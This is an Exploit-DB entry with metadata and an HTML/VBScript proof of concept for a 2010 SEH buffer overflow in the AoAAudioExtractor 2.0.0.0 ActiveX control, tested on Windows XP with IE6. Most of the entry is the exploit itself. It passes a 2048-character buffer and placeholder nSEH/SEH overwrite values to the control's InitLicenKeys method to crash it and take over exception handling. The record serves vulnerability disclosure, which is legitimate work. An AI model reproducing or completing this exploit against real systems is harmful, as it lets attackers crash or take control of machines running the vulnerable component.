AoAAudioExtractor 2.0.0.0 - ActiveX (PoC) (SEH)

Author: s-dz
type: dos
platform: windows
port: 
date_added: 2010-08-09  
date_updated: 2010-08-09  
verified: 1  
codes: OSVDB-107970  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt15000/14593.png  
application_url: http://www.exploit-db.comaoaaudioextractor.exe  

raw file: 14593.html  
<html>

<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script language='vbscript'>

'AoAAudioExtractor 2.0.0.0 ActiveX PoC (SEH)
' Author:    Hadji Samir ,s-dz@hotmail.fr
' Tested on: Windows XP SP2 FR / IE6
' Down:      http://www.aoamedia.com/audioextractor.exe
' Date:      2010-08-09
'samir tjrs mahboul-3lik

arg1=String(2048, "A")
nseh=String(4, "B")
seh=String(4, "C")
arg4=String(100, "D")
arg5=String(100, "E")

target.InitLicenKeys arg1 ,nseh ,seh ,arg4 ,arg5
</script>


hadji samir